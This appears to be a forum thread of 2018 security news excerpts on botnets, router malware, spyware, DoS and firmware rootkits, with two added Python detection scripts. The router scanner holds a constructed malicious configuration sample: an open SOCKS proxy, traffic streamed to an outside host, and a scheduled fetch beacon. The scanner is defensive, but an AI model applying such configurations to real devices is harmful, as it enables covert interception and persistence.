Cyber thread: network espionage, tracking of mobile phones and WLANs, hacking, viruses, DoS etc.

Google tracks you even if you forbid it and block it in the settings – here is how you really delete your search history
Have you disabled Google's location history in your Android phone's settings? A recent study shows that your assumption may be wrong.
A joint study by the Associated Press and Princeton researchers found that Google Maps and Google's search engine together store users' location without the users' consent.
The problem is how location history is switched off.

Disabling it only in the phone's settings is not enough; the feature must also be disabled in the Google account's web settings.
You can reach these at myaccount.google.com/activitycontrols by switching off the Web & App Activity feature.
If you want to get rid of Google's location history entirely, go to myactivity.google.com (Finnish UI: Omat tapahtumat), Lifehacker advises.
Select Item View on the left side of the page, which shows the data stored by each Google product. Select Maps from the list or filter the map results using the search field's filters. Select the results you want and click the search field's "hamburger menu", from which you can delete the results by choosing "Delete results".

Location data is what makes the Google Maps service and commute-related recommendations possible. Exploiting it is also part of Google's other business, however, and it is used, for example, to target advertising.

https://www.tivi.fi/Kaikki_uutiset/...a-nain-poistat-hakuhistorian-oikeasti-6736112

 
"A denial-of-service attack has brought down several authorities' websites – authentication does not work on Kela's site
https://yle.fi/uutiset/3-10349357
12.8.2018 at 18:33

The denial-of-service attack brought down the websites of several central government authorities and ministries in the afternoon, says Pasi Lehmus, CEO of the Government ICT Centre Valtori.

According to Lehmus, the denial-of-service attack took place at around 16:30. The attack was directed against Valtori's services. It prevents authentication to several online services, and some sites do not open at all.

Among others, the sites of the Government, the Ministry of the Interior, the Ministry of Education and Culture and the Ministry of Social Affairs and Health are out of service. The websites of the police and customs have also gone down.

Logging in to the healthcare Omakanta service, Kela and the Population Register Centre is not possible. According to Lehmus, the denial-of-service attack has been beaten back, and the websites are now being brought back up."


https://www.poliisi.fi/keskusrikosp...tunutta_epailtya_palvelunestohyokkaysta_73366
 
Cosmos Bank in India says that hackers made off with $13.4m in stolen funds over the weekend.


Multiple reports out of the country say that a group of attackers used cloned cards to withdraw cash from ATMs at a set time and perform a fraudulent SWIFT money transfer. Together, the efforts resulted in about Rs 94 crore ($13.4m) being stolen from the bank and its account holders.


The attack was believed to have taken place in two phases. The first, on Saturday between 1500 and 2200 local time, was an international effort with money mules in 28 different countries, all extracting cash from their local ATMs. According to the Hindustan Times, 15,000 transactions were carried out over the seven-hour period.


The second phase took place Monday, when a SWIFT transaction saw Cosmos move Rs 13.5 crore ($1.93m) to an account at a bank in Hong Kong.


Security reporter Brian Krebs unknowingly broke word about the heist three days ago when he got hold of a confidential alert sent from the FBI to US banks warning of a pending ATM cash-out attack against a then-unnamed financial institution (later found to be Cosmos).


The warning notes that the Bureau was confident of a cash-out operation set to occur over the weekend (when banks are closed) and that it thought the operation was the result of a breach at a card issuer.


"The cyber criminals typically create fraudulent copies of legitimate cards by sending stolen card data to co-conspirators who imprint the data on reusable magnetic strip cards, such as gift cards purchased at retail stores," the FBI warned.


"At a pre-determined time, the co-conspirators withdraw account funds from ATMs using these cards."


The Indian bank has said account holders' money is safe, but it has suspended online banking in the wake of the incident.


While no official culprit for the attack has been named, India's Economic Times has reported that North Korea's Lazarus Group (who have previously targeted banks in the region) is the likely offender.
https://www.theregister.co.uk/2018/08/15/cosmos_bank_raided/
 
Microsoft has claimed it thwarted a Russian-backed phishing attack by seizing control of fake copies of right-leaning American think tanks' websites – including one led by a prominent Donald Trump critic.

A US court order authorised Microsoft to apprehend six domains that the Windows maker said were linked to the APT28 hacking crew, also known as Fancy Bear and Strontium, according to Redmond.

The Hudson Institute mainly focuses on American national security and foreign policy issues while the International Republican Institute promotes the foreign policy ideas of the US Republican Party, focusing on attitudes to America overseas.

"We have now used this approach 12 times in two years to shut down 84 fake websites associated with this group," boasted Microsoft prez Brad Smith in a corporate blog post.

The six domains were:


  • my-iri.org
  • hudsonorg-my-sharepoint.com
  • senate.group
  • adfs-senate.services
  • adfs-senate.email
  • office365-onedrive.com
The domain for the Hudson Institute is hudson.org, while the IRI resides online at iri.org. The similarities may have been enough to trick the unfamiliar into visiting these sites and entering login credentials or downloading malware.

"We currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains," Smith said.

The IRI was headed up by American senator John McCain, one of president Donald Trump's more outspoken critics from within his own party. McCain, who was recently diagnosed with brain cancer, stepped down from the IRI leadership at the end of July and anointed Dan Sullivan as its new chairman. Like McCain, Sullivan is a critic of Trump.

"The Kremlin has particularly sought to discredit anti-Trump groups, including within the Republican party," opined Dan Arenson, an analyst from infosec firm Falanx Group.
https://www.theregister.co.uk/2018/08/21/microsoft_seizes_apt28_linked_domains/
 
This one is brand new

Internet-connected 3D printers are at risk of being tampered with or even sabotaged because users fail to apply security controls, a researcher has warned.

Xavier Mertens, a senior handler for the SANS Internet Storm Center (ISC) and freelance cybersecurity consultant, found more than 3,700 3D printers directly connected to the internet.

"These printers are controlled using the open source software package 'OctoPrint' but it's likely there are other tools that are similarly affected. OctoPrint is not meant to be exposed in this way, and it explains in its documentation how to deploy the software in a safe way," Mertens explained.

OctoPrint is a web interface for 3D printers that allows users to control and monitor the printer. As things stand, many OctoPrint instances are not properly configured and do not enforce authentication, according to Mertens. Once they have access to the printer, an attacker would be able to download the files that describe parts being printed.

Some of these G-code files may be proprietary, copyrighted or contain trade secrets. An attacker would also be able to swap out these files, replacing them with files that describe similar parts that are "weakened" to produce substandard or unsafe parts.

In response to questions from The Register, an OctoPrint dev emphasised the need for user education.

"This really has nothing to do with 'lack of security controls', the controls (e.g. ACL) are there, it's been recommended over and over again that users should NOT just port forward! The problem here is users going out of their way to expose internal services on the public net.

"There's no way to prevent people from exposing internal services on the net. I try to educate, I'm working on yet another prominent warning, but I can't force people to perform proper (and inconvenient) network security."

3D printers are used to make anything from toys to medical components so if a part's dimensions were meddled with, it could have serious safety implications.

"The problem is not related to the printer, rather if OctoPrint is incorrectly configured and left open on the internet," Mertens told El Reg. In addition, some printers do not have safety switches to prevent them from overheating, which means an attacker could attempt to start a fire by uploading a malicious file.

Mertens said both 3D printers and the files for parts being printed can be protected by ensuring network segmentation; enabling the security controls provided by the tool; and other access controls.

More on his thoughts on the subject can be found in an ISC blog post here.
https://www.theregister.co.uk/2018/09/04/3d_printers_hackable/
 
I wonder how many computers, printers, phones and televisions there are that have not received and will not receive an update for this:
https://www.krackattacks.com/

Could a "worm" appear that spreads from one Wi-Fi network to another? Or one that just monitors network traffic and passes the information on?
 
Could a "worm" appear that spreads from one Wi-Fi network to another? Or one that just monitors network traffic and passes the information on?

It gets too complicated for a worm, so in practice I don't see this happening, but in principle something like that is possible to implement. In practice WPA2 will end up as a legacy system and we will move to a step better encryption, as happened with WEP back in the day.

In other words, it is easier to put WPA and WPA2 cracking into the attack kit alongside the other Wi-Fi tools.
 
Researchers at China's Netlab 360 have discovered that thousands of routers manufactured by the Latvian company MikroTik have been compromised by malware based on a vulnerability made public by WikiLeaks' publication of tools from the CIA's "Vault7" toolkit. While MikroTik posted a software update for the vulnerability in April, researchers found that more than 370,000 MikroTik devices they identified on the Internet were still vulnerable.

According to a report by Netlab 360's Genshen Ye, more than 7,500 of them are actively being spied on by attackers, who are actively forwarding full captures of their network traffic to a number of remote servers. Additionally, 239,000 of the devices have been turned into SOCKS 4 proxies accessible from a single, small Internet address block.

MikroTik provides routing and wireless hardware for Internet service providers and businesses worldwide, including ISP and campus network infrastructure such as outdoor fiber routers and wireless backbones. The vulnerable routers discovered by Netlab 360, still configured with an unpatched interface for the company's Winbox router configuration utility, are widely distributed—but the largest concentrations of affected networks were in Brazil and Russia. There were 14,000 devices identified operating using US-based IP addresses.

Previously, researchers at Trustwave had discovered two malware campaigns against MikroTik routers—the first originally targeting routers in Brazil with CoinHive malware. The attack injected the Coinhive JavaScript into an error page presented by the routers' Web proxy server—and redirected all Web requests from the network to that error page. However, in routers affected by this type of malware found by the Netlab 360 team, the attackers had shot themselves in the foot. "All the external web resources, including those from coinhive.com necessary for web mining, are blocked by the proxy ACLs (access control lists) set by attackers themselves," noted Ye.

Another attack discovered by the Netlab 360 team has turned affected routers into a malicious proxy network, using the SOCKS4 protocol over a very non-standard TCP port (4153). "Very interestingly, the Socks4 proxy config only allows access from one single net-block, 95.154.216.128/25," Ye wrote. Almost all of the traffic is going to 95.154.216.167, an address associated with a hosting service in the United Kingdom.

The attack includes the addition of a scheduled task to report the router's IP address back to the attacker to help maintain the persistence of the SOCKS proxy if the router is rebooted. It's not clear what the proxies are being collected for, but they're currently being used to continuously scan for other vulnerable routers.

The eavesdropping attack leverages MikroTik's built-in packet-sniffing capabilities. The sniffer, which uses the TZSP protocol, can send a stream of packets to a remote system using Wireshark or other packet capture tools. The Netlab 360 team found that more than 7,500 routers that had been compromised were streaming network traffic—largely FTP and email focused traffic, as well as some traffic associated with network management—to a small number of addresses. The vast majority of the streams (5,164 of them) were being sent to an address associated with an ISP in Belize.
https://arstechnica.com/information...sed-to-build-vast-proxy-army-spy-on-networks/
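As an added defensive example (not code from the Ars or Netlab 360 write-up), the script below scans a RouterOS configuration export for the three behaviours the article describes: a SOCKS proxy on port 4153 whose access list admits only 95.154.216.128/25, a packet sniffer streaming to an outside host, and a scheduler entry that fetches a URL to report back. The export syntax and the sample addresses are assumed and constructed, so adapt the section names to a real export from your devices.

```python
import ipaddress
import re

# Values quoted in the Netlab 360 findings above: the SOCKS4 port and the
# single net-block allowed to use the proxies.
KNOWN_SOCKS_PORT = 4153
KNOWN_ATTACKER_BLOCK = ipaddress.ip_network("95.154.216.128/25")

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample in the shape of a RouterOS "/export" (assumed syntax,
# not a capture from a real device). 203.0.113.0/24 is a documentation range.
SAMPLE_EXPORT = """\
/ip socks
set enabled=yes port=4153 version=4
/ip socks access
add action=allow src-address=95.154.216.128/25
add action=deny
/tool sniffer
set streaming-enabled=yes streaming-server=203.0.113.10
/system scheduler
add name=upd interval=1h on-event=":tool fetch url=http://203.0.113.10/poll"
"""

# key=value pairs; a value may be double-quoted and contain spaces
KV_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_export(text):
    """Yield (section, verb, {key: value}) for every command line in an export."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("/"):          # a new menu path, e.g. "/ip socks"
            section = line
            continue
        verb, _, rest = line.partition(" ")
        kv = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
        yield section, verb, kv


def is_rfc1918(addr):
    """True when addr falls inside one of the private RFC 1918 ranges."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


def find_indicators(export_text):
    """Return human-readable findings that match the campaign's behaviour."""
    findings = []
    for section, verb, kv in parse_export(export_text):
        if section == "/ip socks" and verb == "set" and kv.get("enabled") == "yes":
            # Any SOCKS proxy on a router is worth a look; 4153 matches the campaign.
            port = int(kv.get("port", "1080"))
            tag = " (port used in the Netlab 360 campaign)" if port == KNOWN_SOCKS_PORT else ""
            findings.append(f"SOCKS proxy enabled on port {port}{tag}")
        elif section == "/ip socks access" and kv.get("action") == "allow":
            src = kv.get("src-address")
            if src and ipaddress.ip_network(src, strict=False).overlaps(KNOWN_ATTACKER_BLOCK):
                findings.append(f"SOCKS access allowed from attacker net-block {src}")
        elif section == "/tool sniffer" and kv.get("streaming-enabled") == "yes":
            # The built-in sniffer streams TZSP; legitimate use stays on the LAN.
            server = kv.get("streaming-server")
            if server and not is_rfc1918(server):
                findings.append(f"packet sniffer streams TZSP to non-RFC1918 host {server}")
        elif section == "/system scheduler" and "fetch" in kv.get("on-event", ""):
            findings.append(f"scheduler entry '{kv.get('name')}' runs fetch (beacon/persistence)")
    return findings


if __name__ == "__main__":
    for finding in find_indicators(SAMPLE_EXPORT):
        print("[!]", finding)
```

The sample export trips all four checks; run the script against `/export` output from your own routers and treat any hit on the sniffer or scheduler checks as a reason to reflash from a known-good image rather than just remove the entry.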
 
The man who federal prosecutors say operated the Kelihos botnet has now pleaded guilty.

During a hearing in federal court in Hartford, Connecticut on Wednesday, Peter Yuryevich Levashov admitted guilt in one count of causing intentional damage to a protected computer, one count of conspiracy, one count of wire fraud, and one count of aggravated identity theft.

The 38-year-old Russian’s botnet, which dated back to 2010, spanned more than 10,000 machines, and was primarily used to send out spam, steal logins, distribute ransomware, and more. Federal authorities shut it down in 2017.

"For over two decades, Peter Levashov operated botnets which enabled him to harvest personal information from infected computers, disseminate spam, and distribute malware used to facilitate multiple scams," said Assistant Attorney General Brian Benczkowski in a statement.

The Department of Justice said that Levashov "controlled and operated multiple botnets, including the Storm, Waledac and Kelihos botnets, to harvest personal information and means of identification (including email addresses, usernames and logins, and passwords) from infected computers."

In 2009, he was formally charged in the District of Columbia with operating the "Storm" botnet. As Ars has previously reported, Levashov has long been on a list of the World's Ten Worst Spammers, maintained by antispam volunteer organization Spamhaus.

Levashov was arrested in Barcelona, Spain in April 2017 and was extradited to the United States in February 2018, where he has remained in custody. His sentencing has been scheduled for September 6, 2019.
https://arstechnica.com/tech-policy...uilty-admits-he-ran-notorious-kelihos-botnet/
 

If you can steal someone's laptop, leave it switched on in sleep mode, crack it open, hook up some electronics to alter settings in the BIOS firmware, restart it, and boot into a custom program... you can swipe crypto keys and other secrets from the system.

When computers are restarted, the motherboard firmware can wipe the RAM clean to remove any lingering data. It is possible to, while a stolen machine is still in sleep mode, reprogram the firmware's settings to disable this memory zero'ing, and then reboot it into a custom operating system on a USB stick or similar that then scans the RAM for any sensitive information. This information can be used to decrypt encrypted hard drives, and so on.

Whether or not it's easier than smacking the laptop owner with a two-by-four until they give up their login password is, well, an exercise left to our more sociopathic readers.

F-Secure's Olle Segerdahl and Pasi Saarinen this week detailed their memory-slurping technique, effectively bringing cold boot attacks out of the deep freeze from 2008 and putting them back into play. The pair reckon the approach will work against nearly all modern laptops, including Apple Macs.

The hack is tricky, though once mastered, it can be replicated on any purloined machine.
https://www.theregister.co.uk/2018/09/14/cold_boot_attack_reloaded/

A handy attack that can be taught to field staff, if there is a critical need to get into a machine without physically seizing it.
 
It has never been easier to conduct a cyber attack. There now exists a range of off-the-shelf tools and services that do all the heavy lifting – you just need to pick an approach and tool you like best.

There's ransomware-as-a-service with its "here's one I made earlier" code, search engines that show connected interfaces with known vulnerabilities, and downloadable and easy-to-use scanning tools for the discerning script kiddie.

Heck, why bother with tools that need time and effort to find vulnerable systems? Why not just steal credentials and log in via the front door?
https://www.theregister.co.uk/2018/09/17/compromised_credentials/

A good overview of today's reality. If you lift the tinfoil a little, you can easily see that things are the same as they were at the turn of the millennium, and although technology, devices and software have moved forward, people have stayed the same. The cold reality is that nothing is burglar-proof, but the job can be made hard for those who try.
 
Researchers have uncovered two flaws that leave more than 100,000 NUUO-branded internet-connected surveillance cameras open to remote takeover.

Tenable Research on Monday laid claim to discovering two bugs in the NUUO Network Video Recorder software that can be exploited to covertly access a camera's video feed or simply take over the device with malware.

The bugs, named "Peekaboo" for marketing purposes, were both spotted in the NVRMini2, a network-attached device that both stores video recordings and acts as a control gateway for admins and remote viewers.

The first of the two flaws (CVE-2018-1149) is a remote code execution vulnerability that can be exploited by overflowing a buffer. An attacker exploits the bug by connecting to a network- or internet-facing device, and submitting a malformed cookie to its web-based control panel that triggers the flaw in the cgi_system binary.

Once the bug has been exploited, the attacker would be able to inject and execute commands with root privileges. From there, the attacker would be able to do anything from seize control of the camera and access all of its video footage to loading up the device with botnet clients to use for other attacks.

The second flaw, meanwhile, would allow an attacker to covertly access a network- or internet-connected camera's controls without needing to trigger a buffer overflow or other programming cockup. Rather, CVE-2018-1150 is a leftover bit of debug code that allows the attacker to pull up all user accounts and change passwords. The attacker would also be able to control the camera and view recordings.
https://www.theregister.co.uk/2018/09/17/nuuo_cameras_rce/
 
The infamous Pegasus spyware, which targets iPhones and Android devices, has allegedly infiltrated 45 different countries across the globe — and six of those countries have used surveillance malware in the past to abuse human rights, a group of researchers claimed Tuesday.

Researchers from The Citizen Lab scanned the internet in a massive project that took place between 2016 and 2018, sniffing out servers associated with the Pegasus mobile spyware, attributed to Israel-based company NSO Group as an offering for state-level actors around the world.

“The number of Pegasus servers we detected in our scans ballooned from about 200 in 2016 to almost 600 in 2018. This may be an indication that NSO Group is scaling up their operations,” Bill Marczak, senior research fellow at The Citizen Lab and one of the researchers on the team, told Threatpost.

The malware has been active since August 2016 when it was discovered that the NSO Group was selling the mobile spyware to governments and third-parties who wanted its surveillance capabilities in order to read texts, track calls, collect passwords, trace phone locations and gather data from apps of victims.

Pegasus is generally spread through a specially crafted exploit link (via phishing techniques) which when clicked delivers a chain of zero-day exploits to penetrate security features on the phone. The Citizen Lab’s latest report shows that Pegasus has grown more widespread – and alleges that it’s being used by certain countries to target human rights.

That includes the expansion of Pegasus usage in Gulf Cooperation Council countries in the Middle East – particularly to track dissidents, such as UAE activist Ahmed Mansoor, who was targeted by the spyware in 2016; and an Amnesty International staffer and Saudi activist in June 2018.

“Our findings paint a bleak picture of the human-rights risks of NSO’s global proliferation,” researchers said in a Tuesday post. “At least six countries with significant Pegasus operations have previously been linked to abusive use of spyware to target civil society, including Bahrain, Kazakhstan, Mexico, Morocco, Saudi Arabia and the United Arab Emirates.”
https://threatpost.com/dangerous-pegasus-spyware-has-spread-to-45-countries/137506/
 

The Bombe team at The National Museum Of Computing (TNMOC) has succeeded in breaking an Enigma-encrypted message in a live Poland-to-England demo.

The demonstration was described by TNMOC as a tribute to Polish cryptographers and wartime Bletchley Park staff.

The reconstructed Turing-Welchman Bombe at TNMOC in Bletchley Park found the settings and key needed to break an Enigma message. The techniques used were the same as those used by the WWII codebreakers.
https://www.theregister.co.uk/2018/09/21/enigma_live_crack_honours_poles/
 
A network attack is currently causing problems in many Finnish online services
https://www.tivi.fi/Kaikki_uutiset/...nissa-suomalaisissa-verkkopalveluissa-6742438
"We are taking measures right now and restricting traffic. We are blocking certain traffic coming from abroad, which lets us reduce the load so that normal use of the services works again," says Holmroos-Kolari. Afterwards, the VRK intends to find out why the attack-prevention services in use did not stop the attack.

There is a disruption in Suomi.fi identification caused by a targeted denial-of-service attack

- The police's electronic service platform does not work
- Kela describes the disruption in its personal customers' e-service as extensive; it prevents the e-service from working and calls from being connected
- calls also do not get through to district courts or local register offices
- the Tax Administration's and Trafi's services

The Population Register Centre has taken measures and is trying to get the service back into working order as soon as possible.
 
Internet censorship is on the rise, and data from Freedom on the Net, based on an annual assessment of the situation of Internet freedom in 65 countries, reveals that not only has Internet censorship been on the rise for seven straight years now but developed nations are not exempt.

Thanks to recent policy changes such as the US government legalizing the ability of ISPs to sell user data without user permission, the repeal of net neutrality, and the metadata retention scheme in Australia, VPN usage is on the rise, particularly in the West. According to a particular source, VPN usage rose 170 percent in the US in reaction to net neutrality repeal, 470 percent in Australia, and 89 percent in Turkey in reaction to similar attempts to curtail Internet freedom.

Hotspot Shield, which is perhaps the biggest VPN service in the world today, reported having over 100 million downloads in 2017 alone (more than it has ever had in any given year) — a sign of increasing interest in VPN usage thanks to growing censorship. What’s more interesting, however, is the percentage of this growth that came from the US: while Hotspot Shield was mostly used outside the US before 2017 (with about 80 percent of people using it internationally), that all changed in 2017.

AnchorFree, the company behind Hotspot Shield, credits recent policy changes and events in the US for this growth: Hotspot Shield noticed its first big spike in usage from the US in March 2017 when Congress voted to allow internet service providers to sell user data without permission from the user, it noticed another spike after the massive Equifax hack that exposed data of over 140 million users, then it noticed an even bigger spike thanks to the repeal of net neutrality.

In the face of growing censorship, free VPNs, in particular, have an allure: for one, privacy is expected to be a basic human right, and the vast majority of people in censorship-ridden countries — such as Eritrea, Syria, or Ethiopia — cannot afford to pay a monthly fee to use a VPN service on top of the cost of their monthly Internet service subscription.

Unfortunately, free isn’t always good. Using free VPNs, in particular, is like having a fox guard the henhouse.
https://www.hackread.com/almost-every-major-free-vpn-service-is-a-glorified-data-farm/
 
Cunning malware VPNFilter remains under active development, and is acquiring ever more dangerous features.

That's the conclusion Cisco's Talos Intelligence security team reached after delving into recent samples and identifying seven “third-stage VPNFilter modules that add significant functionality to the malware”.

VPNFilter rose to prominence in May, when Talos found half a million pwned home routers and NAS boxes in 54 countries. The FBI attributed the attacks to Russia's Sofacy group (“Fancy Bear”), seized a command-and-control domain, and asked people to reboot their routers.

While maintaining that VPNFilter has mostly been neutralised, Talos' Edmund Brumaghin wrote that “it can still be difficult to detect in the wild if any devices remain unpatched”.

The infosec company has stayed on the case, and this Wednesday released a blog post saying the new functions it has discovered include an “expanded ability” to attack endpoints from compromised network devices, data filtering, “multiple encrypted tunnelling capabilities” to conceal C&C and data exfiltration traffic, and a tool to build a network of proxies to conceal the true source of VPNFilter traffic.

The specific modules are called:

  • htpx – HTTP traffic redirection and traffic inspection;
  • ndbr – a multi-functional SSH utility;
  • nm – network mapping from compromised devices;
  • netfilter – a denial-of-service utility;
  • portforwarding – forwards network traffic to attacker-specified infrastructure;
  • socks5proxy – Sets up a SOCKS5 proxy on the compromised device; and
  • tcpvpn – Sets up a reverse-TCP VPN on the compromised device.

The other important discovery Talos highlighted in the post was the attackers' use of a MikroTik administration utility called Winbox, a small Windows 32 utility that mirrors the functions offered on the Web-based admin interface.
https://www.theregister.co.uk/2018/09/27/fancy_bear_modules/
 
ESET Research has published a paper detailing the discovery of a malware campaign that used repurposed commercial software to create a backdoor in computers’ firmware—a “rootkit,” active since at least early 2017 and capable of surviving the re-installation of the Windows operating system or even hard drive replacement. While the malware had been spotted previously, ESET’s research is the first to show that it was actively attacking the firmware of computers to establish a tenacious foothold.

Dubbed “LoJax,” the malware is the first case of an attack leveraging the Unified Extensible Firmware Interface (UEFI) boot system being used in an attack by an adversary. And based on the way the malware was spread, it is highly likely that it was authored by the Sednit/Fancy Bear/APT 28 threat group—the Russian state-sponsored operation tied by US intelligence and law enforcement to the cyber-attack on the Democratic National Committee.

UEFI uh-oh

There have been a number of security concerns about UEFI’s potential as a hiding place for rootkits and other malware, including those raised by Dick Wilkins and Jim Mortensen of firmware developer Phoenix Technologies in a presentation at UEFI Plugfest last year. “Firmware is software and is therefore vulnerable to the same threats that typically target software,” they explained. UEFI is essentially a lightweight operating system in its own right, making it a handy place to put rootkits for those who can manage it.

WikiLeaks’ Vault 7 files showed that the CIA apparently developed an implant for Apple's computers that used the Extensible Firmware Interface (the predecessor of UEFI) but required physical access to the targeted computer and a malicious Thunderbolt Ethernet adapter (called the “Sonic Screwdriver”). But LoJax is an entirely different animal—it was built to be deployed remotely, using malware tools that can read and overwrite parts of the UEFI firmware’s flash memory.

“Along with the LoJax agents,” ESET researchers noted, “tools with the ability to read systems’ UEFI firmware were found, and in one case, this tool was able to dump, patch and overwrite part of the system’s SPI flash memory. This tool’s ultimate goal was to install a malicious UEFI module on a system whose SPI flash memory protections were vulnerable or misconfigured.”

Because of variations in the implementation of UEFI, those sorts of memory protection issues—the very sort of thing Wilkins and Mortensen warned of—have been entirely too common. And ESET researchers found at least one confirmed case of a successful deployment of LoJax.

Good hackers borrow, state hackers steal

While LoJax shows all the hallmarks of a state-funded attack, the Fancy Bear team had a little bit of a head start when it came to the UEFI payload—the Bears borrowed from a commercial software product that was purpose-built to stay active in a computer’s firmware. LoJax’s rootkit is essentially a modified version of a 2008 release of the LoJack anti-theft agent from Absolute Software, known at release as Computrace.

“LoJack attracted a lot of attention in recent years as it implements a UEFI/BIOS module as a persistence mechanism,” the ESET team wrote. That firmware module ensured a software “small agent” stayed installed on the computer, which connected to an Absolute Web server—even if the computer had its drive wiped. In other words, Computrace was a commercially developed firmware rootkit.

The protocols used by the client associated with LoJack/Computrace had no authentication. So if someone were able to impersonate the Absolute servers, they would have been able to hijack the client to their own ends. While this issue was brought up by researchers in 2014, it would be four more years before there was a hint that someone had actually done that.

On May 1, Arbor Networks reported the discovery of “trojanized” samples of the LoJack small agent—versions that had been modified to communicate with servers suspected to be connected to Fancy Bear activities. Domains used by the malware were the same used in 2017 for another backdoor known as SedUploader. The differences between the legitimate LoJack client and the malicious client were so small—in the tens of bytes, according to the ESET researchers—that they were largely not being detected as malware.

“At the time the [Arbor Networks] blog was published,” the ESET team wrote, “we had found different LoJax small agents targeting different entities in the Balkans as well as Central and Eastern Europe, but had no idea how they were installed.” While some traces of other Fancy Bear/Sednit malware were found in some cases, there were others where no means of delivery was apparent.

And then the researchers found two tools on an infected system—one intended to read the Serial Peripheral Interface (SPI) flash memory associated with UEFI firmware and another to overwrite that memory. The reader tool was based on drivers from a free, legitimate tool called RWEverything. The writer tool, ReWriter_binary, looks for the section of the firmware flash memory containing Driver Execution Environment (DXE) drivers—drivers that execute very early in the UEFI boot-up. It then writes its own malicious DXE driver into that memory area, attempting to circumvent any restrictions set in firmware to prevent such a write. Unfortunately, many of the safeguards to prevent such malicious writing to BIOS are turned off by default in many UEFI implementations.

In another bit of borrowing, the code in the malicious UEFI module uses an NTFS driver to access the Windows disk partition to make changes and install its agent. This NTFS driver was stolen from leaked software written by the Milan-based information security (and offensive hacking for hire) company Hacking Team. So really, this Russian state-sponsored rootkit was a team effort.
https://arstechnica.com/information...aptop-security-software-hijacked-by-russians/
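Added example, not ESET's tooling or code from the article: a Python check of the SPI flash write-protection bits that the write-up says are often left off by default. It decodes BIOS_CNTL values an endpoint agent has read from each machine and sorts hosts by how exposed their firmware region is. Bit positions are assumed from Intel PCH datasheets (confirm them for the chipset in use); the host inventory values are constructed.

```python
# Bit positions in the PCH BIOS_CNTL register (LPC bridge, PCI config offset
# 0xDC). Assumed from Intel PCH datasheets; confirm for the chipset in use.
BIOSWE = 1 << 0    # BIOS Write Enable: 1 = the BIOS flash region is writable
BLE = 1 << 1       # BIOS Lock Enable: 1 = setting BIOSWE raises an SMI
SMM_BWP = 1 << 5   # SMM BIOS Write Protect: 1 = writes accepted only from SMM


def assess_bios_cntl(value):
    """Classify one BIOS_CNTL value as WRITABLE, WEAK or PROTECTED, with a reason."""
    if value & BIOSWE:
        return "WRITABLE", "BIOSWE set: the BIOS region accepts writes right now"
    if not value & BLE:
        return "WRITABLE", "BLE clear: ring-0 code can set BIOSWE and then write"
    if not value & SMM_BWP:
        return ("WEAK",
                "BLE set but SMM_BWP clear: the lock depends on the SMI handler "
                "clearing BIOSWE in time")
    return "PROTECTED", "BLE and SMM_BWP set: flash writes are restricted to SMM"


# Constructed inventory: host -> BIOS_CNTL value read by an endpoint agent
# (made-up values, not from any real fleet).
SAMPLE_INVENTORY = {
    "host-a": 0x00,  # nothing set
    "host-b": 0x02,  # BLE only
    "host-c": 0x22,  # BLE + SMM_BWP
    "host-d": 0x03,  # BIOSWE already set even though BLE is on
}


def triage(inventory):
    """Group hosts by verdict so the writable ones can be handled first."""
    groups = {"WRITABLE": [], "WEAK": [], "PROTECTED": []}
    for host, value in sorted(inventory.items()):
        verdict, _ = assess_bios_cntl(value)
        groups[verdict].append(host)
    return groups


if __name__ == "__main__":
    for host, value in sorted(SAMPLE_INVENTORY.items()):
        verdict, reason = assess_bios_cntl(value)
        print(f"{host}: BIOS_CNTL=0x{value:02x} {verdict}: {reason}")
```

A machine reported WRITABLE or WEAK here may still be covered by the SPI Protected Range registers (PR0 to PR4), so check those before concluding the region is open; a firmware update or vendor BIOS setting that sets BLE and SMM_BWP is the fix the article's "turned off by default" remark points at.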
 